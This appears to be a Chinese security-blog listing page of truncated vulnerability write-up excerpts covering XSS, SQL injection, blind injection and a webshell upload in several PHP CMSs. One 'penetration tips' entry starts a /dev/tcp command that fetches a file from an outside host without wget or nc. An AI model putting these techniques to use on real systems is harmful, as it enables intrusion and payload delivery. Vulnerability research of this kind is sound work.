下载地址:http://down.qibosoft.com/down.php?v=fenlei1.0 首先来看一下inc/common.inc.php中可以看到city_id在全局...
漏洞时代
漏洞时代
漏洞时代
wordpress主题dmeng投稿处存在XSS跨站
因为测试模板。首先解决了私信问题。然后来到了投稿的地方在文件dmeng2.0/author.php 167行开始
漏洞时代
Tccms sql注入#2
常量未定义。看到 /system/core/controller.class.php[php]private function forceAttack() {$attack = M...
漏洞时代
phpyun SQL注入
在/model/qqconnect.class.php文件中: [php] function cert_action(){ $id=$_GET['id']; [email protected]
moonsec_com
Linux常用渗透小技巧
1.无wget nc等下载工具时下载文件 exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.p...
颓废's Blog
DM企业建站系统前台盲注
前台cookie 时间盲注 该套cms主要的安全措施为htmlentities,在POST&&GET的输入点做了html实体化的操作,但是这并不转义单引号(默认不转...
颓废's Blog
FineCMS V5.0.10 任意文件上传&&任意代码执行&&任意SQL语句执行多个漏洞
注册个用户,修改头像,选择一张图片马: 抓包,修改post中tx参数中的jpg为php:
